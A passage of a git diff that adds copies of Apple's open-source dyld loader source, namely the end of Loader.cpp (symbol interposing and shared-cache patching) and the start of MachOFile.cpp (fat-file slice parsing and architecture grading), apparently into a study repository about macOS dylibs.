) + return 0; + + // Always start with objc patching. This is required every when AMFI may not permit other interposing + for ( const InterposeTupleAll& tuple : state.patchedObjCClasses ) { + if ( tuple.replacee == value ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader ? 
forLoader->path() : "dlsym"); + return tuple.replacement; + } + } + + // Next singleton patching, which also may happen without other interposing + for ( const InterposeTupleAll& tuple : state.patchedSingletons ) { + if ( tuple.replacee == value ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader ? forLoader->path() : "dlsym"); + return tuple.replacement; + } + } + +#if !TARGET_OS_EXCLAVEKIT + // AMFI can ban interposing + // Note we check this here just in case someone tried to substitute a fake interposing tuples array in the state + if ( !state.config.security.allowInterposing ) + return value; +#endif + + // look for image specific interposing (needed for multiple interpositions on the same function) + for ( const InterposeTupleSpecific& tuple : state.interposingTuplesSpecific ) { + if ( (tuple.replacee == value) && (tuple.onlyImage == forLoader) ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader->path()); + return tuple.replacement; + } + } + + // no image specific interpose, so look for generic interpose + for ( const InterposeTupleAll& tuple : state.interposingTuplesAll ) { + if ( tuple.replacee == value ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader ? 
forLoader->path() : "dlsym"); + return tuple.replacement; + } + } + return value; +} + +#if (BUILDING_DYLD || BUILDING_UNIT_TESTS) && !TARGET_OS_EXCLAVEKIT +void Loader::applyInterposingToDyldCache(RuntimeState& state) +{ + const DyldSharedCache* dyldCache = state.config.dyldCache.addr; + if ( dyldCache == nullptr ) + return; // no dyld cache to interpose + if ( state.interposingTuplesAll.empty() ) + return; // no interposing tuples + + // make the cache writable for this block + DyldCacheDataConstScopedWriter patcher(state); + + state.setVMAccountingSuspending(true); + for ( const InterposeTupleAll& tuple : state.interposingTuplesAll ) { + uint32_t imageIndex; + uintptr_t cacheOffsetOfReplacee = tuple.replacee - (uintptr_t)dyldCache; + if ( !dyldCache->addressInText(cacheOffsetOfReplacee, &imageIndex) ) + continue; + + // Convert from a cache offset to an image offset + uint64_t mTime; + uint64_t inode; + const dyld3::MachOAnalyzer* imageMA = (dyld3::MachOAnalyzer*)(dyldCache->getIndexedImageEntry(imageIndex, mTime, inode)); + if ( imageMA == nullptr ) + continue; + + uint32_t dylibOffsetOfReplacee = (uint32_t)((dyldCache->unslidLoadAddress() + cacheOffsetOfReplacee) - imageMA->preferredLoadAddress()); + + dyldCache->forEachPatchableExport(imageIndex, ^(uint32_t dylibVMOffsetOfImpl, const char* exportName, + PatchKind patchKind) { + // Skip patching anything other than this symbol + if ( dylibVMOffsetOfImpl != dylibOffsetOfReplacee ) + return; + uintptr_t newLoc = tuple.replacement; + dyldCache->forEachPatchableUseOfExport(imageIndex, dylibVMOffsetOfImpl, + ^(uint64_t cacheVMOffset, MachOLoaded::PointerMetaData pmd, uint64_t addend, + bool isWeakImport) { + uintptr_t* loc = (uintptr_t*)((uintptr_t)dyldCache + cacheVMOffset); + uintptr_t newValue = newLoc + (uintptr_t)addend; + #if __has_feature(ptrauth_calls) + if ( pmd.authenticated ) { + newValue = dyld3::MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::signPointer(newValue, loc, pmd.usesAddrDiversity, 
pmd.diversity, pmd.key); + *loc = newValue; + if ( state.config.log.interposing ) + state.log("interpose: *%p = %p (JOP: diversity 0x%04X, addr-div=%d, key=%s)\n", + loc, (void*)newValue, pmd.diversity, pmd.usesAddrDiversity, MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::keyName(pmd.key)); + return; + } + #endif + if ( state.config.log.interposing ) + state.log("interpose: *%p = 0x%0llX (dyld cache patch) to %s\n", loc, newLoc + addend, exportName); + *loc = newValue; + }); + }); + } + state.setVMAccountingSuspending(false); +} + + +void Loader::applyCachePatchesToOverride(RuntimeState& state, const Loader* dylibToPatch, + uint16_t overriddenDylibIndex, const DylibPatch* patches, + DyldCacheDataConstLazyScopedWriter& cacheDataConst) const +{ + const DyldSharedCache* dyldCache = state.config.dyldCache.addr; + const MachOAnalyzer* dylibToPatchMA = dylibToPatch->analyzer(state); + uint32_t dylibToPatchIndex = dylibToPatch->ref.index; + + // Early return if we have no exports used in the client dylib. Then we don't need to walk every export + if ( !dyldCache->shouldPatchClientOfImage(overriddenDylibIndex, dylibToPatchIndex) ) + return; + + uint32_t patchVersion = dyldCache->patchInfoVersion(); + assert((patchVersion == 2) || (patchVersion == 3) || (patchVersion == 4)); + __block bool suspended = false; + __block const DylibPatch* cachePatch = patches; + dyldCache->forEachPatchableExport(overriddenDylibIndex, ^(uint32_t dylibVMOffsetOfImpl, const char* exportName, + PatchKind patchKind) { + const DylibPatch* patch = cachePatch; + ++cachePatch; + + // Skip patching objc classes and singletons. 
We'll handle those another way + switch ( patchKind ) { + case PatchKind::regular: + break; + case PatchKind::cfObj2: + if ( patch->overrideOffsetOfImpl == DylibPatch::singleton ) + return; + break; + case PatchKind::objcClass: + if ( patch->overrideOffsetOfImpl == DylibPatch::objcClass ) + return; + break; + } + + uintptr_t targetRuntimeAddress = BAD_ROOT_ADDRESS; // magic value to cause a unique crash is missing symbol in root is used + if ( patch->overrideOffsetOfImpl != DylibPatch::missingSymbol ) + targetRuntimeAddress = (uintptr_t)(this->loadAddress(state)) + ((intptr_t)patch->overrideOffsetOfImpl); + + dyldCache->forEachPatchableUseOfExportInImage(overriddenDylibIndex, dylibVMOffsetOfImpl, dylibToPatchIndex, + ^(uint32_t userVMOffset, + dyld3::MachOLoaded::PointerMetaData pmd, uint64_t addend, + bool isWeakImport) { + // ensure dyld cache __DATA_CONST is writeable + cacheDataConst.makeWriteable(); + + // overridden dylib may not effect this dylib, so only suspend when we find it does effect it + if ( !suspended ) { + state.setVMAccountingSuspending(true); + suspended = true; + } + + uintptr_t* loc = (uintptr_t*)((uint8_t*)dylibToPatchMA + userVMOffset); + uintptr_t newValue = targetRuntimeAddress + (uintptr_t)addend; + + // if client in dyld cache is ok with symbol being missing, set its use to NULL instead of bad-missing-value + if ( isWeakImport && (targetRuntimeAddress == BAD_ROOT_ADDRESS) ) + newValue = 0; + + // if overridden dylib is also interposed, use interposing + for ( const InterposeTupleAll& tuple : state.interposingTuplesAll ) { + if ( tuple.replacee == newValue ) { + newValue = tuple.replacement; + } + } +#if __has_feature(ptrauth_calls) + if ( pmd.authenticated && (newValue != 0) ) { + newValue = dyld3::MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::signPointer(newValue, loc, pmd.usesAddrDiversity, pmd.diversity, pmd.key); + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) { + state.log("cache fixup: *0x%012lX = 
0x%012lX (*%s+0x%012lX = %s+0x%012lX) (JOP: diversity=0x%04X, addr-div=%d, key=%s)\n", + (long)loc, newValue, + dylibToPatch->leafName(), (long)userVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl, + pmd.diversity, pmd.usesAddrDiversity, MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::keyName(pmd.key)); + } + } + return; + } +#endif + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) + state.log("cache fixup: *0x%012lX = 0x%012lX (*%s+0x%012lX = %s+0x%012lX)\n", + (long)loc, (long)newValue, + dylibToPatch->leafName(), (long)userVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl); + } + }); + }); + // Ensure the end marker is as expected + assert(cachePatch->overrideOffsetOfImpl == DylibPatch::endOfPatchTable); + + if ( suspended ) + state.setVMAccountingSuspending(false); +} + + +void Loader::applyCachePatchesTo(RuntimeState& state, const Loader* dylibToPatch, DyldCacheDataConstLazyScopedWriter& cacheDataConst) const +{ + // do nothing if this dylib does not override something in the dyld cache + uint16_t overriddenDylibIndex; + const DylibPatch* patches; + if ( !this->overridesDylibInCache(patches, overriddenDylibIndex) ) + return; + if ( patches != nullptr ) + this->applyCachePatchesToOverride(state, dylibToPatch, overriddenDylibIndex, patches, cacheDataConst); + + // The override here may be a root of an iOSMac dylib, in which case we should also try patch uses of the macOS unzippered twin + if ( !this->isPrebuilt && state.config.process.catalystRuntime ) { + if ( const JustInTimeLoader* jitThis = this->isJustInTimeLoader() ) { + if ( const DylibPatch* patches2 = jitThis->getCatalystMacTwinPatches() ) { + uint16_t macOSTwinIndex = Loader::indexOfUnzipperedTwin(state, overriddenDylibIndex); + if ( macOSTwinIndex != kNoUnzipperedTwin ) + this->applyCachePatchesToOverride(state, dylibToPatch, macOSTwinIndex, patches2, cacheDataConst); + } + } + } +} + +void Loader::applyCachePatches(RuntimeState& state, 
DyldCacheDataConstLazyScopedWriter& cacheDataConst) const +{ + // do nothing if this dylib does not override something in the dyld cache + uint16_t overriddenDylibIndex; + const DylibPatch* patches; + if ( !this->overridesDylibInCache(patches, overriddenDylibIndex) ) + return; + + if ( patches == nullptr ) + return; + + const DyldSharedCache* dyldCache = state.config.dyldCache.addr; + + __block bool suspended = false; + __block const DylibPatch* cachePatch = patches; + dyldCache->forEachPatchableExport(overriddenDylibIndex, ^(uint32_t dylibVMOffsetOfImpl, const char* exportName, + PatchKind patchKind) { + const DylibPatch* patch = cachePatch; + ++cachePatch; + + // Skip patching objc classes and singletons. We'll handle those another way + switch ( patchKind ) { + case PatchKind::regular: + break; + case PatchKind::cfObj2: + if ( patch->overrideOffsetOfImpl == DylibPatch::singleton ) + return; + break; + case PatchKind::objcClass: + if ( patch->overrideOffsetOfImpl == DylibPatch::objcClass ) + return; + break; + } + + uintptr_t targetRuntimeAddress = BAD_ROOT_ADDRESS; // magic value to cause a unique crash is missing symbol in root is used + if ( patch->overrideOffsetOfImpl != DylibPatch::missingSymbol ) + targetRuntimeAddress = (uintptr_t)(this->loadAddress(state)) + ((intptr_t)patch->overrideOffsetOfImpl); + + dyldCache->forEachPatchableGOTUseOfExport(overriddenDylibIndex, dylibVMOffsetOfImpl, + ^(uint64_t cacheVMOffset, dyld3::MachOLoaded::PointerMetaData pmd, uint64_t addend, + bool isWeakImport) { + // ensure dyld cache __DATA_CONST is writeable + cacheDataConst.makeWriteable(); + + // overridden dylib may not effect this dylib, so only suspend when we find it does effect it + if ( !suspended ) { + state.setVMAccountingSuspending(true); + suspended = true; + } + uintptr_t* loc = (uintptr_t*)((uint8_t*)dyldCache + cacheVMOffset); + uintptr_t newValue = targetRuntimeAddress + (uintptr_t)addend; + + // if client in dyld cache is ok with symbol being missing, set 
its use to NULL instead of bad-missing-value + if ( isWeakImport && (targetRuntimeAddress == BAD_ROOT_ADDRESS) ) + newValue = 0; + +#if __has_feature(ptrauth_calls) + if ( pmd.authenticated && (newValue != 0) ) { + newValue = dyld3::MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::signPointer(newValue, loc, pmd.usesAddrDiversity, pmd.diversity, pmd.key); + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) { + state.log("cache GOT fixup: *0x%012lX = 0x%012lX (*cache+0x%012lX = %s+0x%012lX) (JOP: diversity=0x%04X, addr-div=%d, key=%s)\n", + (long)loc, newValue, (long)cacheVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl, + pmd.diversity, pmd.usesAddrDiversity, + MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::keyName(pmd.key)); + } + } + return; + } +#endif + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) + state.log("cache GOT fixup: *0x%012lX = 0x%012lX (*cache+0x%012lX = %s+0x%012lX)\n", + (long)loc, (long)newValue, + (long)cacheVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl); + } + }); + }); + // Ensure the end marker is as expected + assert(cachePatch->overrideOffsetOfImpl == DylibPatch::endOfPatchTable); + + if ( suspended ) + state.setVMAccountingSuspending(false); +} + +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + +uint16_t Loader::indexOfUnzipperedTwin(const RuntimeState& state, uint16_t overrideIndex) +{ + if ( state.config.process.catalystRuntime ) { + // Find the macOS twin overridden index + if ( const PrebuiltLoaderSet* cachePBLS = state.cachedDylibsPrebuiltLoaderSet() ) { + const Loader* overridenDylibLdr = cachePBLS->atIndex(overrideIndex); + if ( const PrebuiltLoader* overridenDylibPBLdr = overridenDylibLdr->isPrebuiltLoader() ) { + if ( overridenDylibPBLdr->supportsCatalyst ) + return overridenDylibPBLdr->indexOfTwin; + } + } else { + // We might be running with an invalid version, so can't use Prebuilt loaders + const char* catalystInstallName = 
state.config.dyldCache.getIndexedImagePath(overrideIndex); + if ( strncmp(catalystInstallName, "/System/iOSSupport/", 19) == 0 ) { + const char* macTwinPath = &catalystInstallName[18]; + uint32_t macDylibCacheIndex; + if ( state.config.dyldCache.indexOfPath(macTwinPath, macDylibCacheIndex) ) + return macDylibCacheIndex; + } + } + } + + return kNoUnzipperedTwin; +} + +#if !TARGET_OS_EXCLAVEKIT +uint64_t Loader::getOnDiskBinarySliceOffset(RuntimeState& state, const MachOAnalyzer* ma, const char* path) +{ +#if BUILDING_DYLD +#if TARGET_OS_OSX && __arm64__ + // these are always thin and sanboxing blocks open()ing them + if ( strncmp(path, "/usr/libexec/rosetta/", 21) == 0 ) + return 0; +#endif + __block Diagnostics diag; + __block uint64_t sliceOffset = 0; + state.config.syscall.withReadOnlyMappedFile(diag, path, false, ^(const void* mapping, size_t mappedSize, bool isOSBinary, const FileID& fileID, const char* realPath) { + if ( const dyld3::FatFile* ff = dyld3::FatFile::isFatFile(mapping) ) { + ff->forEachSlice(diag, mappedSize, ^(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop) { + if ( memcmp(ma, sliceStart, 64) == 0 ) { + sliceOffset = (uint8_t*)sliceStart - (uint8_t*)mapping; + stop = true; + } + }); + } + }); + return sliceOffset; +#else + // don't record a sliceOffset when the dyld cache builder is run in Mastering because the file may be thinned later + return 0; +#endif +} +#endif // !TARGET_OS_EXCLAVEKIT + +} // namespace \ No newline at end of file diff --git a/IV. Dylibs/macos/MachOFile.cpp b/IV. Dylibs/macos/MachOFile.cpp new file mode 100644 index 0000000..cfbfa38 --- /dev/null +++ b/IV. Dylibs/macos/MachOFile.cpp @@ -0,0 +1,4094 @@ +// Source (dyld-1122.1) https://github.com/apple-oss-distributions/dyld/blob/18d3cb0f6b46707fee6d315cccccf7af8a8dbe57/common/MachOFile.cpp#L1213C25-L1213C25 +/* + * Copyright (c) 2017 Apple Inc. All rights reserved. 
+ * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include "Defines.h" +#if TARGET_OS_EXCLAVEKIT + #define OSSwapBigToHostInt32 __builtin_bswap32 + #define OSSwapBigToHostInt64 __builtin_bswap64 + #define htonl __builtin_bswap32 +#else + #include + #include + #include + #include + #include + #include + #include + #include +#if SUPPORT_CLASSIC_RELOCS + #include + #include +#endif +extern "C" { + #include + #include + #include +} +#endif + +#include "Defines.h" + +#include + +#include "Array.h" +#include "MachOFile.h" +#include "SupportedArchs.h" +#include "CodeSigningTypes.h" + +#if (BUILDING_DYLD || BUILDING_LIBDYLD) && !TARGET_OS_EXCLAVEKIT + #include +#endif + +namespace dyld3 { + +#if !TARGET_OS_EXCLAVEKIT + +//////////////////////////// posix wrappers //////////////////////////////////////// + +// wrap calls to stat() with check for EAGAIN +int stat(const char* path, struct stat* buf) +{ + int result; + do { +#if BUILDING_DYLD + result = ::stat_with_subsystem(path, buf); +#else + result = ::stat(path, buf); +#endif + } while ((result == -1) 
&& ((errno == EAGAIN) || (errno == EINTR))); + + return result; +} + +// wrap calls to stat() with check for EAGAIN +int fstatat(int fd, const char *path, struct stat *buf, int flag) +{ + int result; + do { + result = ::fstatat(fd, path, buf, flag); + } while ((result == -1) && ((errno == EAGAIN) || (errno == EINTR))); + + return result; +} + +// dyld should retry open() if it gets an EGAIN +int open(const char* path, int flag, int other) +{ + int result; + do { +#if BUILDING_DYLD + if (flag & O_CREAT) + result = ::open(path, flag, other); + else + result = ::open_with_subsystem(path, flag); +#else + result = ::open(path, flag, other); +#endif + } while ((result == -1) && ((errno == EAGAIN) || (errno == EINTR))); + + return result; +} +#endif // !TARGET_OS_EXCLAVEKIT + + +//////////////////////////// FatFile //////////////////////////////////////// + +const FatFile* FatFile::isFatFile(const void* fileStart) +{ + const FatFile* fileStartAsFat = (FatFile*)fileStart; + if ( (fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC)) || (fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC_64)) ) + return fileStartAsFat; + else + return nullptr; +} + +bool FatFile::isValidSlice(Diagnostics& diag, uint64_t fileLen, uint32_t sliceIndex, + uint32_t sliceCpuType, uint32_t sliceCpuSubType, uint64_t sliceOffset, uint64_t sliceLen) const { + if ( greaterThanAddOrOverflow(sliceOffset, sliceLen, fileLen) ) { + diag.error("slice %d extends beyond end of file", sliceIndex); + return false; + } + const dyld3::MachOFile* mf = (const dyld3::MachOFile*)((uint8_t*)this+sliceOffset); + if (!mf->isMachO(diag, sliceLen)) + return false; + if ( mf->cputype != (cpu_type_t)sliceCpuType ) { + diag.error("cpu type in slice (0x%08X) does not match fat header (0x%08X)", mf->cputype, sliceCpuType); + return false; + } + else if ( (mf->cpusubtype & ~CPU_SUBTYPE_MASK) != (sliceCpuSubType & ~CPU_SUBTYPE_MASK) ) { + diag.error("cpu subtype in slice (0x%08X) does not match fat header (0x%08X)", 
mf->cpusubtype, sliceCpuSubType); + return false; + } + uint32_t pageSizeMask = mf->uses16KPages() ? 0x3FFF : 0xFFF; + if ( (sliceOffset & pageSizeMask) != 0 ) { + // slice not page aligned + if ( strncmp((char*)this+sliceOffset, "!", 7) == 0 ) + diag.error("file is static library"); + else + diag.error("slice is not page aligned"); + return false; + } + return true; +} + +void FatFile::forEachSlice(Diagnostics& diag, uint64_t fileLen, bool validate, + void (^callback)(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop)) const +{ + if ( this->magic == OSSwapBigToHostInt32(FAT_MAGIC) ) { + const uint64_t maxArchs = ((4096 - sizeof(fat_header)) / sizeof(fat_arch)); + const uint32_t numArchs = OSSwapBigToHostInt32(nfat_arch); + if ( numArchs > maxArchs ) { + diag.error("fat header too large: %u entries", numArchs); + return; + } + // make sure architectures list doesn't exceed the file size + // We can’t overflow due to maxArch check + // Check numArchs+1 to cover the extra read after the loop + if ( (sizeof(fat_header) + ((numArchs + 1) * sizeof(fat_arch))) > fileLen ) { + diag.error("fat header malformed, architecture slices extend beyond end of file"); + return; + } + bool stop = false; + const fat_arch* const archs = (fat_arch*)(((char*)this)+sizeof(fat_header)); + for (uint32_t i=0; i < numArchs; ++i) { + uint32_t cpuType = OSSwapBigToHostInt32(archs[i].cputype); + uint32_t cpuSubType = OSSwapBigToHostInt32(archs[i].cpusubtype); + uint32_t offset = OSSwapBigToHostInt32(archs[i].offset); + uint32_t len = OSSwapBigToHostInt32(archs[i].size); + Diagnostics sliceDiag; + if ( !validate || isValidSlice(sliceDiag, fileLen, i, cpuType, cpuSubType, offset, len) ) + callback(cpuType, cpuSubType, (uint8_t*)this+offset, len, stop); + if ( stop ) + break; + if ( sliceDiag.hasError() ) + diag.appendError("%s, ", sliceDiag.errorMessageCStr()); + } + + // Look for one more slice + if ( numArchs != maxArchs ) { + uint32_t 
cpuType = OSSwapBigToHostInt32(archs[numArchs].cputype); + uint32_t cpuSubType = OSSwapBigToHostInt32(archs[numArchs].cpusubtype); + uint32_t offset = OSSwapBigToHostInt32(archs[numArchs].offset); + uint32_t len = OSSwapBigToHostInt32(archs[numArchs].size); + if ((cpuType == CPU_TYPE_ARM64) && ((cpuSubType == CPU_SUBTYPE_ARM64_ALL || cpuSubType == CPU_SUBTYPE_ARM64_V8))) { + if ( !validate || isValidSlice(diag, fileLen, numArchs, cpuType, cpuSubType, offset, len) ) + callback(cpuType, cpuSubType, (uint8_t*)this+offset, len, stop); + } + } + } + else if ( this->magic == OSSwapBigToHostInt32(FAT_MAGIC_64) ) { + const uint32_t numArchs = OSSwapBigToHostInt32(nfat_arch); + if ( numArchs > ((4096 - sizeof(fat_header)) / sizeof(fat_arch_64)) ) { + diag.error("fat header too large: %u entries", OSSwapBigToHostInt32(nfat_arch)); + return; + } + // make sure architectures list doesn't exceed the file size + // We can’t overflow due to maxArch check + if ( (sizeof(fat_header) + (numArchs * sizeof(fat_arch_64))) > fileLen ) { + diag.error("fat header malformed, architecture slices extend beyond end of file"); + return; + } + bool stop = false; + const fat_arch_64* const archs = (fat_arch_64*)(((char*)this)+sizeof(fat_header)); + for (uint32_t i=0; i < numArchs; ++i) { + uint32_t cpuType = OSSwapBigToHostInt32(archs[i].cputype); + uint32_t cpuSubType = OSSwapBigToHostInt32(archs[i].cpusubtype); + uint64_t offset = OSSwapBigToHostInt64(archs[i].offset); + uint64_t len = OSSwapBigToHostInt64(archs[i].size); + if ( !validate || isValidSlice(diag, fileLen, i, cpuType, cpuSubType, offset, len) ) + callback(cpuType, cpuSubType, (uint8_t*)this+offset, len, stop); + if ( stop ) + break; + } + } + else { + diag.error("not a fat file"); + } +} + +void FatFile::forEachSlice(Diagnostics& diag, uint64_t fileLen, void (^callback)(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop)) const +{ + forEachSlice(diag, fileLen, true, callback); 
+} + +const char* FatFile::archNames(char strBuf[256], uint64_t fileLen) const +{ + strBuf[0] = '\0'; + Diagnostics diag; + __block bool needComma = false; + this->forEachSlice(diag, fileLen, false, ^(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop) { + if ( needComma ) + strlcat(strBuf, ",", 256); + strlcat(strBuf, MachOFile::archName(sliceCpuType, sliceCpuSubType), 256); + needComma = true; + }); + return strBuf; +} + +bool FatFile::isFatFileWithSlice(Diagnostics& diag, uint64_t fileLen, const GradedArchs& archs, bool isOSBinary, + uint64_t& sliceOffset, uint64_t& sliceLen, bool& missingSlice) const +{ + missingSlice = false; + if ( (this->magic != OSSwapBigToHostInt32(FAT_MAGIC)) && (this->magic != OSSwapBigToHostInt32(FAT_MAGIC_64)) ) + return false; + + __block int bestGrade = 0; + forEachSlice(diag, fileLen, ^(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop) { + if (int sliceGrade = archs.grade(sliceCpuType, sliceCpuSubType, isOSBinary)) { + if ( sliceGrade > bestGrade ) { + sliceOffset = (char*)sliceStart - (char*)this; + sliceLen = sliceSize; + bestGrade = sliceGrade; + } + } + }); + if ( diag.hasError() ) + return false; + + if ( bestGrade == 0 ) + missingSlice = true; + + return (bestGrade != 0); +} + + +//////////////////////////// GradedArchs //////////////////////////////////////// + + +#define GRADE_i386 CPU_TYPE_I386, CPU_SUBTYPE_I386_ALL, false +#define GRADE_x86_64 CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_ALL, false +#define GRADE_x86_64h CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_H, false +#define GRADE_armv7 CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7, false +#define GRADE_armv7s CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7S, false +#define GRADE_armv7k CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7K, false +#define GRADE_armv6m CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V6M, false +#define GRADE_armv7m CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7M, false +#define GRADE_armv7em CPU_TYPE_ARM, 
CPU_SUBTYPE_ARM_V7EM, false +#define GRADE_armv8m CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V8M, false +#define GRADE_arm64 CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64_ALL, false +#define GRADE_arm64e CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64E, false +#define GRADE_arm64e_pb CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64E, true +#define GRADE_arm64_32 CPU_TYPE_ARM64_32, CPU_SUBTYPE_ARM64_32_V8, false + +const GradedArchs GradedArchs::i386 = GradedArchs({GRADE_i386, 1}); +const GradedArchs GradedArchs::x86_64 = GradedArchs({GRADE_x86_64, 1}); +const GradedArchs GradedArchs::x86_64h = GradedArchs({GRADE_x86_64h, 2}, {GRADE_x86_64, 1}); +const GradedArchs GradedArchs::arm64 = GradedArchs({GRADE_arm64, 1}); +#if SUPPORT_ARCH_arm64e +const GradedArchs GradedArchs::arm64e_keysoff = GradedArchs({GRADE_arm64e, 2}, {GRADE_arm64, 1}); +const GradedArchs GradedArchs::arm64e_keysoff_pb = GradedArchs({GRADE_arm64e_pb, 2}, {GRADE_arm64, 1}); +const GradedArchs GradedArchs::arm64e = GradedArchs({GRADE_arm64e, 1}); +const GradedArchs GradedArchs::arm64e_pb = GradedArchs({GRADE_arm64e_pb, 1}); +#endif +const GradedArchs GradedArchs::armv7 = GradedArchs({GRADE_armv7, 1}); +const GradedArchs GradedArchs::armv7s = GradedArchs({GRADE_armv7s, 2}, {GRADE_armv7, 1}); +const GradedArchs GradedArchs::armv7k = GradedArchs({GRADE_armv7k, 1}); +const GradedArchs GradedArchs::armv7m = GradedArchs({GRADE_armv7m, 1}); +const GradedArchs GradedArchs::armv7em = GradedArchs({GRADE_armv7em, 1}); + + +#if SUPPORT_ARCH_arm64_32 +const GradedArchs GradedArchs::arm64_32 = GradedArchs({GRADE_arm64_32, 1}); +#endif +#if BUILDING_LIBDYLD || BUILDING_UNIT_TESTS +const GradedArchs GradedArchs::launch_AS = GradedArchs({GRADE_arm64e, 3}, {GRADE_arm64, 2}, {GRADE_x86_64, 1}); +const GradedArchs GradedArchs::launch_AS_Sim = GradedArchs({GRADE_arm64, 2}, {GRADE_x86_64, 1}); +const GradedArchs GradedArchs::launch_Intel_h = GradedArchs({GRADE_x86_64h, 3}, {GRADE_x86_64, 2}, {GRADE_i386, 1}); +const GradedArchs GradedArchs::launch_Intel = 
GradedArchs({GRADE_x86_64, 2}, {GRADE_i386, 1}); +const GradedArchs GradedArchs::launch_Intel_Sim = GradedArchs({GRADE_x86_64, 2}, {GRADE_i386, 1}); +#endif + +int GradedArchs::grade(uint32_t cputype, uint32_t cpusubtype, bool isOSBinary) const +{ + for (const auto& p : _orderedCpuTypes) { + if (p.type == 0) { break; } + if ( (p.type == cputype) && (p.subtype == (cpusubtype & ~CPU_SUBTYPE_MASK)) ) { + if ( p.osBinary ) { + if ( isOSBinary ) + return p.grade; + } + else { + return p.grade; + } + } + } + return 0; +} + +const char* GradedArchs::name() const +{ + return MachOFile::archName(_orderedCpuTypes[0].type, _orderedCpuTypes[0].subtype); +} + +void GradedArchs::forEachArch(bool platformBinariesOnly, void (^handler)(const char*)) const +{ + for (const auto& p : _orderedCpuTypes) { + if (p.type == 0) + break; + if ( p.osBinary && !platformBinariesOnly ) + continue; + handler(MachOFile::archName(p.type, p.subtype)); + } +} + +bool GradedArchs::checksOSBinary() const +{ + for (const auto& p : _orderedCpuTypes) { + if (p.type == 0) { return false; } + if ( p.osBinary ) { return true; } + } + __builtin_unreachable(); +} + +bool GradedArchs::supports64() const +{ + return (_orderedCpuTypes.front().type & CPU_ARCH_ABI64) != 0; +} + +#if __x86_64__ +static bool isHaswell() +{ + // FIXME: figure out a commpage way to check this + struct host_basic_info info; + mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT; + mach_port_t hostPort = mach_host_self(); + kern_return_t result = host_info(hostPort, HOST_BASIC_INFO, (host_info_t)&info, &count); + mach_port_deallocate(mach_task_self(), hostPort); + return (result == KERN_SUCCESS) && (info.cpu_subtype == CPU_SUBTYPE_X86_64_H); +} +#endif + +const GradedArchs& GradedArchs::forCurrentOS(bool keysOff, bool osBinariesOnly) +{ +#if __arm64e__ + if ( osBinariesOnly ) + return (keysOff ? arm64e_keysoff_pb : arm64e_pb); + else + return (keysOff ? 
